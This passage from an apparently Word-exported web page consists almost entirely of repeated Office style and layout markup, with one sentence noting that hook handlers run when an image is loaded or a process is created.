<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span><br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">These
functions are called whenever an image is loaded or a process is created,
respectively. The handlers for the hooks checks to see if it is called in any
of the process stated below.</span></span></div>
<span style="font-family: Times,"Times New Roman",serif;">
</span>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><br /></span></div>
<span style="font-family: Times,"Times New Roman",serif;">
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--></span></div>
</span><br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
